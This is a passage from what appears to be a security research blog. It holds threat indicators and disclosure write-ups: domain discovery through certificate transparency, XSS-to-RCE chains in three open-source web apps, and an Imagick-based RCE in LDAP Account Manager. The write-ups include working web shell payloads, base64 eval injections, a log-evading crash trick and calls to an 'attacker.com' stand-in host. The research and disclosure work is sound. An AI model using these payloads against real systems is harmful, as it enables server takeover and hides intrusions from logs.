45.145.67[.]170 45.227.255[.]215 45.32.141[.]138 45.32.228[.]189 45.32.228[.]190 45.55.36[.]143 45.61.136[.]207 45.61.136[.]5 45.61.136[.]83 46.161.27[.]117 5.165.200[.]7 52.154.0[.]241 64.227.0[.]177 64.4.238[.]56 65.188.102[.]43 66.42.97[.]210 67.171.114[.]251 68.183.200[.]63 68.46.232[.]60 73.153.192[.]98 74.119.194[.]203 74.119.194[.]4 76.22.236[.]142 82.116.32[.]77 87.251.67[.]41 94.142.241[.]194 ### Domains cisco-help[.]cf cisco-helpdesk[.]cf ciscovpn1[.]com ciscovpn2[.]com ciscovpn3[.]com devcisco[.]com devciscoprograms[.]com helpzonecisco[.]com kazaboldu[.]net mycisco[.]cf mycisco[.]gq mycisco-helpdesk[.]ml primecisco[.]com pwresetcisco[.]com ### Email Addresses costacancordia[@]protonmail[.]com # Discovering Domains via a Timing Attack on Certificate Transparency 9 August 2022 at 11:29 Many modern websites employ an automatic issuance and renewal of TLS certificates. For enterprises, there are DigiCert services. For everyone else, there are free services such as Let’s Encrypt and ZeroSSL. There is a flaw in a way that deployment of TLS certificates might be set up. It allows anyone to discover all domain names used by the same server. Sometimes, even when there is no HTTPS there! In this article, I describe a new technique for discovering domain names. Afterward, I show how to use it in threat intelligence, penetration testing, and bug bounty. ## Quick Overview Certificate Transparency (CT) is an Internet security standard for monitoring and auditing the issuance of TLS certificates. It creates a system of public logs that seek to record all certificates issued by publicly trusted certificate authorities (CAs). To search through CT logs, Crt.sh or Censys services are usually used. Censys also adds certificates from the scan results to the database. It’s already known that by looking through CT logs it’s possible to discover obscure subdomains or to discover brand-new domains with CMS installation scripts available. There is much more to it. Sometimes the following or equivalent configuration is set up on the server: # /etc/crontab 37 13 */10 * * certbot renew --post-hook "systemctl reload nginx" This configuration means that certificates for all the host’s domains are renewed in the same time. Therefore, by a timing attack on certificate transparency, we can discover all these domains! Let’s see how this can be applied in practice! ## A Real Case Scenario. Let’s Encrypt A month ago, I tried to download dnSpy, and I discovered a malicious dnSpy website. I sent several abuse reports, and I was able to block it in just 2 hours: Be aware, dnSpy .NET Debugger / Assembly Editor has been trojaned again! In Google’s TOP 2, there was a malicious site maintained by threat actors, who also distributed infected CPU-Z, Notepad++, MinGW, and many more. Thanks to NameSilo, the domain has been deactivated! pic.twitter.com/EdTlFjtN4B — Arseniy Sharoglazov (@_mohemiv) July 8, 2022 I found quite a lot of information about the threat actors who created this website online. For example, there is an article in Bleeping Computer and detailed research from Colin Cowie. In short, a person or a group of people create malicious websites mimicking legitimate ones. The websites distribute infected software, both commercial and open source. Affected software includes, but is not limited to Burp Suite, Minecraft, Tor Browser, dnSpy, OBS Studio, CPU-Z, Notepad++, MinGW, Cygwin, and XAMPP. I wasn’t willing to put up with the fact that someone trojans cool open source projects like OBS Studio or MinGW, and I decided to take matters into my own hands. ###### Long Story Short I sent more than 20 abuse reports, and I was able to shut down a lot of infrastructure of the threat actors: It isn’t easy to confront these threat actors. They purchase domains on different registrars using different accounts. Next, they use an individual account for each domain on Cloudflare to proxy all traffic to the destination server. Finally, they wait for some time before putting malicious content on the site, or they hide it under long URLs. Some of the domains controlled by the threat actors are known from Twitter: cpu-z[.]org, gpu-z[.]org, blackhattools[.]net, obsproject[.]app, notepadd[.]net, codenote[.]org, minecraftfree[.]net, minecraft-java[.]com, apachefriends[.]co, ... The question is how to discover other domains of the threat actors. Other domains may have nothing in common, and each of them would refer to Cloudflare. This is where our timing attack on certificate transparency comes into play. Take a look at one of the certificates to the known domain cpu-z[.]net, used by the threat actors: This certificate has the validity start field equal to 2022-07-23 13:59:54. Let’s utilize the parsed.validity.start filter to look for certificates that were issued a few seconds later: Here it is! We just discovered a domain that wasn’t known before! Let’s open a website with this domain: This is exactly what we were looking for! Earlier I was able to disclose the real IP address of cpu-z[.]org. This IP address belonged to Hawk Host, and after my abuse report to them, all websites of the threat actors on Hawk Host started to show this exact page. This proves that we discovered a domain managed by the same threat actors. A few pages later a domain blazefiles[.]net can be found, which distributed infected Adobe products. It also displays the same Hawk Host page. There are a lot more domains used by these threat actors, so let’s just move on. ###### Why did the technique work? The threat actors set up their websites by software such as Plesk, cPanel, or CyberPanel. It was automatically issuing and renewing trusted certificates for all websites, even though these certificates were never needed. If we try to search for cpu-z[.]org certificates, we would see a bunch of not-needed certificates issued by the hosting servers: All of these certificates can be dug up from certificate transparency logs, and correlated with other certificates by their timestamps. ## DigiCert and Other CAs DigiCert services are used by large companies for the automatic issuance of TLS certificates. The validity field of DigiCert certificates doesn’t contain the time when the certificate was issued. The same is true for some other certificate authorities, for example, ZeroSSL. However, if we look at crt.sh’s representation of transparency logs, we would see that crt.sh IDs of certificates owned by the same company may go quite close to each other: This means that even when a CA doesn’t include the exact issuing time to certificates, the certificates issued at the same time can still be discovered. Additionally, you may find two types of certificates in the logs: precertificates and leaf certificates. If you have access to the leaf certificate, you can take a look at the signed certificate timestamp (SCT) filed in it: The SCT field should always contain a timestamp, even when the time in the validity field is 00:00:00. ## What’s Next Probably, some kind of tooling is needed to help with discovering domains by this technique. The ways to correlate domains that may be utilized: • Analyzing certificates with close issuance time • Analyzing certificates with close timestamps in the SCT field • Analyzing certificates that come close to each other in CT logs • Analyzing time periods between known certificates • Analyzing certificates issued after a round period of time from the known timestamps • Getting an intersection for sets of certificates issued close in time regarding the known timestamps • The same, but for sets of certificates that come close to each other in CT logs Regarding mitigation, regularly inspect CT logs for your domains. You may discover not only domains affected by attacks on CT but also certificates issued by threat actors attacking your infrastructure. Feel free to comment on this article on our Twitter. Follow @ptswarm or @_mohemiv so you don’t miss our future research and other publications. # Researching Open Source apps for XSS to RCE flaws 28 July 2022 at 13:54 Cross-Site Scripting (XSS) is one of the most commonly encountered attacks in web applications. If an attacker can inject a JavaScript code into the application output, this can lead not only to cookie theft, redirection or phishing, but also in some cases to a complete compromise of the system. In this article I’ll show how to achieve a Remote Code Execution via XSS on the examples of Evolution CMS, FUDForum, and GitBucket. ## Evolution CMS v3.1.8 Link: https://github.com/evolution-cms/evolution CVE: Pending Evolution CMS describes itself as the world’s fastest and the most customizable open source PHP CMS. In Evolution CMS, I discovered an unescaped display of user-controlled data, which leads to the possibility of reflected XSS attacks: I will give an example of a link with a payload. https://192.168.1.76/manager/?a=35&id=1%22%3E%3Cimg%20src=1%20onerror=alert(document.domain)%3E If an administrator authorized in the system follows the link or clicks on it, then the javascript code will be executed in the administrator’s browser: In the admin panel of Evolution CMS, in the file manager section, the administrator can upload files. The problem is that it cannot upload php files, however, it can edit existing ones. We will give an example javascript code that will overwrite index.php file with phpinfo() function: $.get('/manager/?a=31',function(d) {
let p = $(d).contents().find('input[name=\"path\"]').val();$.ajax({
url:'/manager/index.php',
type:'POST',
contentType:'application/x-www-form-urlencoded',
data:'a=31&mode=save&path='+p+'/index.php&content=<?php phpinfo(); ?>'}
);
});


It’s time to combine the payload and the javascript code described above, which, as an example, can be encoded in Base64:

https://192.168.1.76/manager/?a=35&id=1%22%3E%3Cimg%20src=1%20onerror=eval(atob(%27JC5nZXQoJy9tYW5hZ2VyLz9hPTMxJyxmdW5jdGlvbihkKXtsZXQgcCA9ICQoZCkuY29udGVudHMoKS5maW5kKCdpbnB1dFtuYW1lPSJwYXRoIl0nKS52YWwoKTskLmFqYXgoe3VybDonL21hbmFnZXIvaW5kZXgucGhwJyx0eXBlOidQT1NUJyxjb250ZW50VHlwZTonYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkJyxkYXRhOidhPTMxJm1vZGU9c2F2ZSZwYXRoPScrcCsnL2luZGV4LnBocCZjb250ZW50PTw/cGhwIHBocGluZm8oKTsgPz4nfSk7fSk7%27))%3E

In case of a successful attack on an administrator authorized in the system, the index.php file will be overwritten with the code that the attacker placed in the payload. In this case, this is a call of phpinfo() function:

## FUDforum v3.1.1

CVE: Pending

FUDforum is a super fast and scalable discussion forum. It is highly customizable and supports unlimited members, forums, posts, topics, polls, and attachments.

In a FUDforum, I found unescaped display of user-controlled data in the name of an attachment in a private message or forum topic, which allows to perform a stored XSS attack. Attach and upload a file with the name: <img src=1 onerror=alert()>.png . After downloading this file, the javascript code will be executed in the browser:

The FUDforum admin panel has a file manager that allows you to upload files to the server, including files with the php extension.

An attacker can use stored XSS to upload a php file that can execute any command on the server.

There is already a public exploit for the FUDforum, which, using a javascript code, uploads a php file on behalf of the administrator:

const action = '/adm/admbrowse.php';

let cur = '/var/www/html/fudforum.loc';
let boundary = "-----------------------------347796892242263418523552968210";
let contentType = "application/x-php";
let fileName = 'shell.php';
let fileData = "<?=$_GET[cmd]?>"; let xhr = new XMLHttpRequest(); xhr.open('POST', action, true); xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary); let body = "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="cur"\r\n\r\n'; body += cur + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n'; body += csrf + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n'; body += "Content-Type: " + contentType + "\r\n\r\n"; body += fileData + "\r\n\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n'; body += "1" + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n'; body += fileName + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n'; body += "Upload File" + '\r\n'; body += "--" + boundary + "--"; xhr.send(body); } let req = new XMLHttpRequest(); req.onreadystatechange = function() { if (req.readyState == 4 && req.status == 200) { let response = req.response; uploadShellWithCSRFToken(response.querySelector('input[name=SQ]').value); } } req.open("GET", action, true); req.responseType = "document"; req.send();  Now an attacker can write a private message to himself and attach the mentioned exploit as a file. After the message has been sent to itself, needs to get the path to the hosted javascript exploit on the server: index.php?t=getfile&id=7&private=1 The next step is to prepare the javascript payload that will be executed via a stored XSS attack. The essence of the payload is to get an early placed exploit and run it: $.get('index.php?t=getfile&id=7&&private=1',function(d){eval(d)})

It remains to put everything together to form the full name of the attached file in private messages. We will encode the assembled javascript payload in Base64:

<img src=1 onerror=eval(atob('JC5nZXQoJ2luZGV4LnBocD90PWdldGZpbGUmaWQ9NyYmcHJpdmF0ZT0xJyxmdW5jdGlvbihkKXtldmFsKGQpfSk='))>.png

After the administrator reads the private message sent by the attacker with the attached file, a file named shell.php will be created on the server on behalf of the administrator, which will allow the attacker to execute arbitrary commands on the server:

## GitBucket v4.37.1

CVE: Pending

GitBucket is a Git platform powered by Scala with easy installation, high extensibility, and GitHub API compatibility.

In GitBucket, I found unescaped display of user-controlled issue name on the home page and attacker’s profile page (/hacker?tab=activity), which leads to a stored XSS:

Having a stored XSS attack, can try to exploit it in order to execute code on the server. The admin panel has tools for performing SQL queries – Database viewer.

GitBucket use H2 Database Engine by default. For this database, there is a publicly available exploit to achieve a Remote Code Execution.

So, all an attacker needs to do is create a PoC code based on this exploit, upload it to the repository and and use it during an attack:

var url = "/admin/dbviewer/_query";
$.post(url, {query: 'CREATE ALIAS EXECVE AS $$String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A");return s.hasNext() ? s.next() : ""; }$$;' }) .done(function(data) {$.post(url, {query: "CALL EXECVE('touch HACKED')"})})


Now it remains to create a new issue or rename the old one and perform a stored XSS attack with an early exploit loaded:

Issue 1"><script src="/hacker/Repo1/raw/f85ebe5d6b979ca69411fa84749edead3eec8de0/exploit.js"></script>

When the administrator visits the attacker’s profile page or the main page, an exploit will be executed on his behalf and a HACKED file will be created on the server:

## Conclusions

We have demonstrated that a low-skilled attacker can easily achieve a remote code execution via any XSS attack in multiple open-source applications.

Information about all found vulnerabilities was reported to maintainers. Fixes are available in the official  repositories:

# Exploiting Arbitrary Object Instantiations in PHP without Custom Classes

14 July 2022 at 13:18

During an internal penetration test, I discovered an unauthenticated Arbitrary Object Instantiation vulnerability in LAM (LDAP Account Manager), a PHP application.

PHP’s Arbitrary Object Instantiation is a flaw in which an attacker can create arbitrary objects. This flaw can come in all shapes and sizes. In my case, the vulnerable code could have been shortened to one simple construction:

new $_GET['a']($_GET['b']);

That’s it. There was nothing else there, and I had zero custom classes to give me a code execution or a file upload. In this article, I explain how I was able to get a Remote Code Execution via this construction.

## Discovering LDAP Account Manager

In the beginning of our internal penetration test I scanned the network for 636/tcp port (ssl/ldap), and I discovered an LDAP service:

$nmap 10.0.0.1 -p80,443,389,636 -sC -sV -Pn -n Nmap scan report for 10.0.0.1 Host is up (0.005s latency). PORT STATE SERVICE VERSION 369/tcp closed ldap 443/tcp open ssl/http Apache/2.4.25 (Debian) 636/tcp open ssl/ldap OpenLDAP 2.2.X - 2.3.X | ssl-cert: Subject: commonName=*.company.com | Subject Alternative Name: DNS:*.company.com, DNS:company.com | Not valid before: 2022-01-01T00:00:00 |_Not valid after: 2024-01-01T23:59:59 |_ssl-date: TLS randomness does not represent time I tried to access this LDAP service via an anonymous session, but it failed: $ ldapsearch -H ldaps://10.0.0.1:636/ -x -s base -b '' "(objectClass=*)" "*" +
ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)

However, after I put the line “10.0.0.1 company.com” to my /etc/hosts file, I was able to connect to this LDAP and extract all publicly available data. This meant the server had a TLS SNI check, and I was able to bypass it using a hostname from the server’s certificate.

The domain “company.com” wasn’t the right domain name of the server, but it worked.

$ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + configContext: cn=config namingContexts: dc=linux,dc=company,dc=com …$ ldapsearch -H ldaps://company.com:636/ -x -s sub -b 'dc=linux,dc=company,dc=com' "(objectClass=*)" "*" +
…
objectClass: person
objectClass: ldapPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAuZwGKsvsKlXhscOsIMUrwtFvoEgl
…

After extracting information, I discovered that almost every user record in the LDAP had the sshPublicKey property, containing the users’ SSH public keys. So, gaining access to this server would mean gaining access to the entire Linux infrastructure of this customer.

Since I wasn’t aware of any vulnerabilities in OpenLDAP, I decided to brute force the Apache server on port 443/tcp for any files and directories. There was only one directory:

[12:00:00] 301 -   344B   ->  /lam => https://10.0.0.1/lam/

And this is how I found the LAM system.

## LDAP Account Manager

LDAP Account Manager (LAM) is a PHP web application for managing LDAP directories via a user-friendly web frontend. It’s one of the alternatives to FreeIPA.

I encountered the LAM 5.5 system:

The default configuration of LAM allows any LDAP user to log in, but it might easily be changed to accept users from a specified administrative group only. Additional two-factor authentication, such as Yubico or TOTP, can be enforced as well.

The source code of LAM could be downloaded from its official GitHub page. LAM 5.5 was released in September 2016. The codebase of LAM 5.5 is quite poor compared to its newer versions, and this gave me some challenges.

In contrast to many web applications, LAM is not intended to be installed manually to a web server. LAM is included in Debian repositories and is usually installed from there or from deb/rpm packages. In such a setup, there should be no misconfigurations and no other software on the server.

## Analyzing LDAP Account Manager

LAM 5.5 has a few scripts available for unauthenticated users.

I found an LDAP Injection, which was useless since the data were being injected into an anonymous LDAP session, and an Arbitrary Object Instantiation.

/lam/templates/help.php:

if (isset($_GET['module']) && !($_GET['module'] == 'main') && !($_GET['module'] == '')) { include_once(__DIR__ . "/../lib/modules.inc"); if (isset($_GET['scope'])) {
$helpEntry = getHelp($_GET['module'],$_GET['HelpNumber'],$_GET['scope']);
}
else {
$helpEntry = getHelp($_GET['module'],$_GET['HelpNumber']); } … /lib/modules.inc: function getHelp($module,$helpID,$scope='') {
…
$moduleObject = moduleCache::getModule($module, $scope); … /lam/lib/account.inc: public static function getModule($name, $scope) { … self::$cache[$name . ':' .$scope] = new $name($scope);
…

Here, the value of $_GET['module'] gets to $name, and the value of $_GET['scope'] gets to $scope. After this, the construction new $name($scope) is executed.

So, whether I would access the entire Linux infrastructure of this customer has come to whether I will be able to exploit this construction to a Remote Code Execution or not.

## Exploiting “new $a($b)” via Custom Classes or Autoloading

In the construction new $a($b), the variable $a stands for the class name that the object will be created for, and the variable $b stands for the first argument that will be passed to the object’s constructor.

If $a and $b come from GET/POST, they can be strings or string arrays. If they come from JSON or elsewhere, they might have other types, such as object or boolean.

Let’s consider the following example:

class App {
function __construct ($cmd) { system($cmd);
}
}

# Additionally, in PHP < 8.0 a constructor might be defined using the name of the class
class App2 {
function App2 ($cmd) { system($cmd);
}
}

# Vulnerable code
$a =$_GET['a'];
$b =$_GET['b'];

new $a($b);

In this code, you can set  $a to App or App2 and $b  to  uname -a. After this, the command  uname -a  will be executed.

When there are no such exploitable classes in your application, or you have the class needed in a separate file that isn’t included by the vulnerable code, you may take a look at autoloading functions.

Autoloading functions are set by registering callbacks via spl_autoload_register or by defining __autoload. They are called when an instance of an unknown class is trying to be created.


spl_autoload_register(function ($class_name) { include './../classes/' .$class_name . '.php';
});

# An example of an autoloading function, works only in PHP < 8.0
function __autoload($class_name) { include$class_name . '.php';
};

# Calling spl_autoload_register with no arguments enables the default autoloading function, which includes lowercase($classname) + .php/.inc from include_path spl_autoload_register(); Depending on the PHP version, and the code in the autoloading functions, some ways to get a Remote Code Execution via autoloading might exist. In LAM 5.5, I wasn’t able to find any useful custom class, and I didn’t have autoloading either. ## Exploiting “new$a($b)” via Built-In Classes When you don’t have custom classes and autoloading, you can rely on built-in PHP classes only. There are from 100 to 200 built-in PHP classes. The number of them depends on the PHP version and the extensions installed. All of built-in classes can be listed via the get_declared_classes function, together with the custom classes: var_dump(get_declared_classes()); Classes with useful constructors can be found via the reflection API. If you control multiple constructor parameters and can call arbitrary methods afterwards, there are many ways to get a Remote Code Execution. But if you can pass only one parameter and don’t have any calls to the created object, there is almost nothing. I know of only three ways to get something from new$a($b). ###### Exploiting SSRF + Phar deserialization The SplFileObject class implements a constructor that allows connection to any local or remote URL: new SplFileObject('http://attacker.com/'); This allows SSRF. Additionally, SSRFs in PHP < 8.0 could be turned into deserializations via techniques with the Phar protocol. I didn’t need SSRF because I had access to the local network. And, I wasn’t able to find any POP-chain in LAM 5.5, so I didn’t even consider exploiting deserialization via Phar. ###### Exploiting PDOs The PDO class has another interesting constructor: new PDO("sqlite:/tmp/test.txt") The PDO constructor accepts DSN strings, allowing us to connect to any local or remote database using installed database extensions. For example, the SQLite extension can create empty files. When I tested this on my target server, I discovered that it didn’t have any PDO extensions. Neither SQLite, MySQL, ODBC, and so on. ###### SoapClient/SimpleXMLElement XXE In PHP ≤ 5.3.22 and ≤ 5.4.12, the constructor of SoapClient was vulnerable to XXE. The constructor of SimpleXMLElement was vulnerable to XXE as well, but it required libxml2 < 2.9. ## Discovering New Ways to Exploit “new$a($b)” To discover new ways to exploit new$a($b), I decided to expand the surface of attack. I started with figuring out which PHP versions LAM 5.5 supports, as well as what PHP extensions it uses. Since LAM is distributed via deb/rpm packages, it contains a configuration file with all its requirements and dependents: Source: ldap-account-manager Maintainer: Roland Gruber <[email protected]> Section: web Priority: extra Standards-Version: 3.9.8 Build-Depends: debhelper (>= 7), po-debconf, yui-compressor Homepage: https://www.ldap-account-manager.org/ Package: ldap-account-manager Architecture: all Depends: php5 (>= 5.4.26) | php (>= 21), php5-ldap | php-ldap, php5-gd | php-gd, php5-json | php-json , php5-imagick | php-imagick, apache2 | httpd, debconf (>= 0.2.26) | debconf-2.0,${misc:Depends}
Recommends: php-apc
Suggests: ldap-server, php5-mcrypt, ldap-account-manager-lamdaemon, perl
...

Contents of the configuration file for deb packages (view on GitHub)

LAM 5.5 requires PHP ≥ 5.4.26, and LDAP, GD, JSON, and Imagick extensions.

Imagick is infamous for remote code execution vulnerabilities, such as ImageTragick and others. That’s where I decided to continue my research.

## The Imagick Extension

The Imagick extension implements multiple classes, including the class Imagick. Its constructor has only one parameter, which can be a string or a string array:

I tested whether  Imagick::__construct  accepts remote schemes and can connect to my host via HTTP:

I discovered that the Imagick class exists on the target server, and executing  new Imagick(...) is enough to coerce the server to connect to my host. However, it wasn’t clear whether creating an Imagick instance is enough to trigger any vulnerabilities in ImageMagick.

I tried to send publicly available POCs to the server, but they all failed. After that, I decided to make it easy, and I asked for advice in one of the application security communities.

Luckily for me, Emil Lerner came to help. He said that if I could pass values such as “epsi:/local/path” or “msl:/local/path” to ImageMagick, it would use their scheme part, e.g., epsi or msl, to determine the file format.

## Exploring the MSL Format

The most interesting ImageMagick format is MSL.

MSL stands for Magick Scripting Language. It’s a built-in ImageMagick language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem.

I tested whether new Imagick(...) allows msl: scheme:

The MSL scheme worked on the latest versions of PHP, Imagick, and ImageMagick!

Unfortunately, URLs like msl:http://attacker.com/ aren’t supported, and I needed to upload files to the server to make msl: work.

In LAM, there are no scripts that allow unauthenticated uploads, and I didn’t think that a technique with PHP_SESSION_UPLOAD_PROGRESS would help because I needed a well-formed XML file for MSL.

## Imagick’s Path Parsing

Imagick supports not only its own URL schemes but also PHP schemes (such as “php://”, “zlib://”, etc). I decided to find out how it works.

Here is what I discovered.

###### A null-byte still works

An Imagick argument is truncated by a null-byte, even when it contains a PHP scheme:

# No errors
$a = new Imagick("/tmp/positive.png\x00.jpg"); # No errors$a = new Imagick("http://attacker.com/test\x00test");
###### Square brackets can be used to detect ImageMagick

ImageMagick is capable of reading options, e.g., an image’s size or frame numbers, from square brackets from the end of the file path:

# No errors
$a = new Imagick("/tmp/positive.png[10x10]"); # No errors$a = new Imagick("/tmp/positive.png[10x10]\x00.jpg");

This might be used to determine whether you control input into the ImageMagick library.

###### “https://” goes to PHP, but “https:/” goes to curl

ImageMagick supports more than 100 different schemes.

Half of ImageMagick’s schemes are mapped to external programs. This mapping can be viewed using the convert -list delegate command:

I discovered that both PHP and ImageMagick support HTTPS schemes.

Furthermore, passing the “https:/” string to new Imagick(...) bypasses PHP’s HTTPS client and invokes a curl process:

This also overcomes the TLS certificate check, because the -k flag is used. This flushes the server’s output to /tmp/*.dat file, which can be found by brute forcing /proc/[pid]/fd/[fd] filenames when the process is active.

I wasn’t able to receive a connection using the “https:/” scheme from the target server, probably because there was no curl.

###### PHP’s arrays can be used to enumerate files

When I discovered the curl technique with flushing the request data to /tmp/*.dat, and brute forcing /proc/[pid]/fd/[fd], I tested whether new Imagick('http://...') flushes data as well. It does!

I tested whether I could temporarily make an MSL content appear in /proc/[pid]/fd/[fd] of one of the Apache worker process, and access it subsequently from another one.

Since new Imagick(...) allows string arrays and stops processing entities after the first error, I was able to enumerate PIDs on the server and discover all PIDs of the Apache workers I can read file descriptors from:

I discovered that due to some hardening in Debian, I can access only the Apache worker process I execute code in and no others. However, this technique worked locally on my Arch Linux.

## RCE #1: PHP Crash + Brute Force

After testing multiple ways to include a file from a file descriptor, I discovered that text:fd:30 and similar constructions case a worker process to crash on the remote web server:

This is what made it initially possible to upload a web shell!

The idea was to create multiple PHP temporary files with our content using multipart/form-data requests. According to the default max_file_uploads value, any client can send up to 20 files in a multipart request, which will be saved to /tmp/phpXXXXXX paths, where X ∈ [A-Za-z0-9]. These files will never be deleted if we cause the worker that creates them to crash.

If we send 20,000 such multipart requests containing 20 files each, it will result in the creation of 400,000 temporary files.

20,000 × 20 = 400,000
(26+26+10)6 / 400,000 = 142,000
P(A) = 1 – (1 – 400,000/(26+26+10)6)142,000 ≈ 0.6321

So, in a 63.21% chance, after 142,000 tries we will be able to guess at least one temporary name and include our file with the MSL content.

Sending more than 20,000 initial requests wouldn’t speed up the process. Any request that causes a crash is quite slow and takes more than a second. What’s more, the creation of more than 400,000 files may create unexpected overhead on the filesystem.

Let’s construct this multipart request!

First, we need to create an image with a web shell, since MSL allows only images to work with:

convert xc:red -set 'Copyright' '<?php @eval(@$_REQUEST["a"]); ?>' positive.png Second, let’s create an MSL file that will copy this image from our HTTP server to a writable web directory. It wasn’t hard to find such a directory in configuration files of LAM. <?xml version="1.0" encoding="UTF-8"?>  And third, let’s put it all together in Burp Suite Intruder: To make the attack smooth, I set the PHPSESSID cookie to prevent the creation of multiple session files (not to be confused with temporary upload files) and specified the direct IP of the server since it turned out that we had a balancer on 10.0.0.1 that was directing requests to different data centers. Additionally, I enabled the denial-of-service mode in Burp Intruder to prevent descriptor exhaustion of Burp Suite, which might happen because of incorrect TCP handling on the server side. After all 20,000 multipart requests were sent, I brute forced the /tmp/phpXXXXXX files via Burp Intruder: There is nothing to see there; all the server responses stayed the same. However, after 120,000 tries, our web shell was uploaded! After this, we got administrative access to OpenLDAP, and took control over all Linux servers of this customer with the maximum privileges! ## RCE #2: VID Scheme I tried to reproduce the technique with text:fd:30 locally, and I discovered that this construction no longer crashes ImageMagick. I went deep to ImageMagick sources to find a new crash, and I found something much better. Here is my discovery. Let’s look into the function ReadVIDImage(...), which is used for parsing VID schemes: The VID scheme accepts masks, and constructs filepaths using them. So, using the vid: scheme, we can include our temporary file with the MSL content without knowing its name: After this, I discovered quite interesting caption: and info: schemes. The combination of both allows to eliminate an out-of-band connection, and create a web shell in one fell swoop: This is how we were able to exploit this Arbitrary Object Instantiation in one request, and without any of the application’s classes! ## The Final Payload Here is the final payload for exploiting Arbitrary Object Instantiations: Class Name: Imagick Argument Value: vid:msl:/tmp/php* -- Request Data -- Content-Type: multipart/form-data; boundary=ABC Content-Length: ... Connection: close --ABC Content-Disposition: form-data; name="swarm"; filename="swarm.msl" Content-Type: text/plain <?xml version="1.0" encoding="UTF-8"?> 
--ABC--

It should work on every system on which the Imagick extension is installed, and it can be used in deserializations if you find a suitable gadget.

When the PHP runtime is libapache2-mod-php, you can prevent logging of this request by uploading a web shell and crashing the process at the same time:

Argument Value: ["vid:msl:/tmp/php*", "text:fd:30"]

Since the construction text:fd:30 doesn’t work on the latest ImageMagick, here is another one:

Crash Construction: str_repeat("vid:", 400)

This one works on every ImageMagick below 7.1.0-40 (released on July 4, 2022).

In installations like Nginx + PHP-FPM, the request wouldn’t disappear from Nginx’s logs, but it should not be written to PHP-FPM logs.

## Afterword

Our team would like to say thank you to Roland Gruber, the developer of LAM, for the quick response and the patch, and to all researchers who previously looked at ImageMagick and shared their findings.

Timeline:

• 16 June, 2022 — Reported to Roland Gruber
• 16 June, 2022 — Initial reply from Roland Gruber
• 27 June, 2022 — LAM 8.0 is released
• 27 June, 2022 — CVE-2022-31084, CVE-2022-31085, CVE-2022-31086, CVE-2022-31087, CVE-2022-31088 are issued
• 29 June, 2022 — LAM 8.0.1 is released, additional hardening has been done
• 05 July, 2022 — Debian packages are updated
• 14 July, 2022 — Public disclosure

Additionally, in case of exploitation of Arbitrary Object Instantiations with an injection to a constructor with two parameters, there is a public vector for this (in Russian). If you have three, four, or five parameters, you can use the SimpleXMLElement class and enable external entities.

Feel free to comment this article on our Twitter. Follow @ptswarm or @_mohemiv so you don’t miss our future research and other publications.

# A Kernel Hacker Meets Fuchsia OS

24 May 2022 at 09:52

Fuchsia is a general-purpose open-source operating system created by Google. It is based on the Zircon microkernel written in C++ and is currently under active development. The developers say that Fuchsia is designed with a focus on security, updatability, and performance. As a Linux kernel hacker, I decided to take a look at Fuchsia OS and assess it from the attacker’s point of view. This article describes my experiments.

## Summary

• In the beginning of the article, I will give an overview of the Fuchsia operating system and its security architecture.
• Then I’ll show how to build Fuchsia from the source code and create a simple application to run on it.
• A closer look at the Zircon microkernel: I’ll describe the workflow of the Zircon kernel development and show how to debug it using GDB and QEMU.
• My exploit development experiments for the Zircon microkernel:
• Fuzzing attempts,
• Exploiting a memory corruption for a C++ object,
• Kernel control-flow hijacking,
• Planting a rootkit into Fuchsia OS.
• Finally, the exploit demo.

I followed the responsible disclosure process for the Fuchsia security issues discovered during this research.

## What is Fuchsia OS

Fuchsia is a general-purpose open-source operating system. Google started the development of this OS around 2016. In December 2020 this project was opened for contributors from the public. In May 2021 Google officially released Fuchsia running on Nest Hub devices. The OS supports arm64 and x86-64. Fuchsia is under active development and looks alive, so I decided to do some security experiments on it.

Let’s look at the main concepts behind the Fuchsia design. This OS is developed for the ecosystem of connected devices: IoT, smartphones, PCs. That’s why Fuchsia developers pay special attention to security and updatability. As a result, Fuchsia OS has unusual security architecture.

First of all, Fuchsia has no concept of a user. Instead, it is capability-based. The kernel resources are exposed to applications as objects that require the corresponding capabilities. The main idea is that an application can’t interact with an object if it doesn’t have an explicitly granted capability. Moreover, software running on Fuchsia should receive the least capabilities to perform its job. So, I think, the concept of local privilege escalation (LPE) in Fuchsia would be different from that in GNU/Linux systems, where an attacker executes code as an unprivileged user and exploits some vulnerability to gain root privileges.

The second interesting aspect: Fuchsia is based on a microkernel. That has great influence on the security properties of this OS. Compared to the Linux kernel, plenty of functionality is moved out from the Zircon microkernel to userspace. That makes the kernel attack surface smaller. See the scheme from the Fuchsia documentation below, which shows that Zircon implements only a few services unlike monolithic OS kernels. However, Zircon does not strive for minimality: it has over 170 syscalls, vastly more than a typical microkernel does.

The next security solution I have to mention is sandboxing. Applications and system services live in Fuchsia as separate software units called components. These components run in isolated sandboxes. All inter-process communication (IPC) between them must be explicitly declared. Fuchsia even has no global file system. Instead, each component is given its own local namespace to operate. This design solution increases userspace isolation and security of Fuchsia applications. I think it also makes the Zircon kernel very attractive for an attacker, since Zircon provides system calls for all Fuchsia components.

Finally, Fuchsia has an unusual scheme of software delivery and updating. Fuchsia components are identified by URLs and can be resolved, downloaded, and executed on demand. The main goal of this design solution is to make software packages in Fuchsia always up to date, like web pages.

These security features made Fuchsia OS a new and interesting research target for me.

## First try

The Fuchsia documentation provides a good tutorial describing how to get started with this OS. The tutorial gives a link to a script that can check your GNU/Linux system against the requirements for building Fuchsia from source:

